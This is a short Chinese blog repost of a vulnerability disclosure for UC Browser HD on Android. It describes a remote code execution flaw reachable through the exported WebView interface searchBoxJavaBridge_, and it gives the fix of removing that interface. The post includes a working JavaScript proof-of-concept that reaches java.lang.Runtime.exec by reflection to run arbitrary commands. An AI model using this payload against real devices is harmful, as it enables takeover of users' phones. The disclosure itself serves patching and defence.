UC浏览器HD版本远程代码执行漏洞 – 网站安全 – 自

时间: 2020-10-10|tag: 6次围观|0 条评论

浏览器来说这种问题还是需要修补的   导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4.0手机上测试实际存在,4.2以上版本不存在   

function execute(cmdArgs)

{

return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);

}

 

      测试页面:http://drops.wooyun.org/webview.html   参见: http://www.2cto.com/Article/201309/241271.html
  漏洞证明: 1.jpg 修复方案: 需要把这个接口删除,调用remove JavascriptInterface方法
http://www.2cto.com/Article/201404/296370. html

    上一篇: Android WebView的Js对象注入漏洞解决方案 - 网站安

    下一篇: destoon新版短消息中心xss指谁打谁 - 网站安全 - 自
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《UC浏览器HD版本远程代码执行漏洞 – 网站安全 – 自
   

还没有人抢沙发呢~